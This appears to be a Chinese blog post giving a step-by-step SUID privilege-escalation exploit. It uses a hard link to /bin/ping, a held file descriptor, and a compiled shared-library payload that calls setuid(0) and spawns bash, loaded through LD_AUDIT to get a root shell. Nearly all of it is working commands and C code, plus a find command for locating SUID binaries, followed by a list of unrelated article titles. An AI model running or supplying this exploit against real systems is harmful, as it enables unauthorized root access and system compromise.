SUID提权
2024-08-21 03:29:14
查看tmp目录权限
ll -d /tmp
切换到tmp目录
cd /tmp
创建一个exploit目录
mkdir exploit
查看ping命令带suid权限
ll /bin/ping
创建target文件硬链接
ln /bin/ping /tmp/exploit/target
查看target文件权限
ll /tmp/exploit/target
把target文件加载到内存中
exec 3< /tmp/exploit/target
查看target在内存中的情况
"ll /proc/$$/fd/3"
删除target文件
rm -rf /tmp/exploit/
查看target在内存中的情况是删除状态
"ll /proc/$$/fd/3"
创建一个c语言代码
vim payload.c
void __attribute__((constructor)) init() // 两个下划线
{
setuid(0);
system("/bin/bash");
}
利用gcc编译这段代码
gcc -W -fPIC -shared -o /tmp/exploit payload.c
提升到root权限
LD_AUDIT="\$ORIGIN" exec /proc/self/fd/3
执行完,查看当前会话已经是root
whoami
附:通过以下的命令可以找到系统上所有的设置了suid的文件:
find / -perm -04000 -type f -ls
最新文章
- 转:eclipse以及step into step over step return的区别
- 51nod 1422(强行YY)
- 《day18_String练习_基本类型包装类_集合入门》
- Python 上传和更新函数模块到PyPI
- kontalk
- DLL模块例2:使用__declspec(dllexport)导出函数,extern ";C";规范修饰名称,隐式连接调用dll中函数
- 关于bootstrap--表单(下拉<;select>;、输入框<;input>;、文本域<;textare>;复选框<;checkbox>;和单选按钮<;radio>;)
- hadoop笔记之Hive的管理(web界面方式)
- 数据完整性(Data Integrity)笔记
- IOS开发-UI学习-UISlider(滑动条)的使用
- AJAX验证码检查
- BCDEdit命令添加WinPE启动项
- 模拟IC芯片设计开发的流程
- JavaScript(三、DOM文档对象模型)
- springmvc 项目完整示例02 项目创建-eclipse创建动态web项目 配置文件 junit单元测试
- 从零开始学习html(八)CSS选择器——下
- ThinkPad L421 如何进入BIOS?(已解决)
- s11 day105
- C++中int转string与string转int
- mongo之map-reduce笔记